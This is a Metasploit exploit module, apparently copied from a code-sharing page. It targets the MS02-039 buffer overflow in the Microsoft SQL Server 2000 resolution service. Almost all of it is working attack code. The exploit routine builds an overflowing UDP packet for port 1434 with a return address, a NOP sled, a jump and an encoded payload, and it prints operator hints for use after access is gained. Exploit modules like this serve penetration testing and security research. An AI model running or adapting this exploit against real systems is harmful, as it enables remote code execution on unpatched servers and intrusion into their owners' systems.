Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GoodRanking
8

9
  include Msf::Exploit::Remote::MSSQL
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'MS02-039 Microsoft SQL Server Resolution Overflow',
14
      'Description'    => %q{
15
          This is an exploit for the SQL Server 2000 resolution
16
        service buffer overflow. This overflow is triggered by
17
        sending a udp packet to port 1434 which starts with 0x04 and
18
        is followed by long string terminating with a colon and a
19
        number. This module should work against any vulnerable SQL
20
        Server 2000 or MSDE install (pre-SP3).
21

22
      },
23
      'Author'         => [ 'hdm' ],
24
      'License'        => MSF_LICENSE,
25
      'References'     =>
26
        [
27
          [ 'CVE', '2002-0649'],
28
          [ 'OSVDB', '4578'],
29
          [ 'BID', '5310'],
30
          [ 'MSB', 'MS02-039'],
31

32
        ],
33
      'Privileged'     => true,
34
      'Payload'        =>
35
        {
36
          'Space'    => 512,
37
          'BadChars' => "\x00\x3a\x0a\x0d\x2f\x5c",
38
          'StackAdjustment' => -3500,
39
        },
40
      'Targets'        =>
41
        [
42
          [
43
            'MSSQL 2000 / MSDE <= SP2',
44
            {
45
              'Platform' => 'win',
46
              'Ret'      => 0x42b48774,
47
            },
48
          ],
49
        ],
50
      'Platform'       => 'win',
51
      'DisclosureDate' => '2002-07-24',
52
      'DefaultTarget' => 0))
53

54
    register_options(
55
      [
56
        Opt::RPORT(1434)
57
      ])
58
  end
59

60

61
  def check
62
    info = mssql_ping
63
    if (info['ServerName'])
64
      print_status("SQL Server Information:")
65
      info.each_pair { |k,v|
66
        print_status("   #{k + (" " * (15-k.length))} = #{v}")
67
      }
68
      return Exploit::CheckCode::Detected
69
    end
70
    return Exploit::CheckCode::Safe
71
  end
72

73
  def exploit
74

75
    connect_udp
76
    print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret))
77
    print_status("Execute 'net start sqlserveragent' once access is obtained");
78

79
    # \x68:888 => push dword 0x3838383a
80
    buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888"
81

82
    # Return to the stack pointer
83
    buf[ 97, 4] = [target.ret].pack('V')
84

85
    # Which lands right here
86
    buf[101, 6] = make_nops(6)
87

88
    # Jumps 8 bytes ahead
89
    buf[107, 2] = "\xeb\x08"
90

91
    # Write to thread storage space to avoid a crash
92
    buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV')
93

94
    # And finally into the payload
95
    buf[117,payload.encoded.length] = payload.encoded
96

97
    udp_sock.put(buf)
98

99
    disconnect_udp
100
    handler
101
  end
102
end
103

104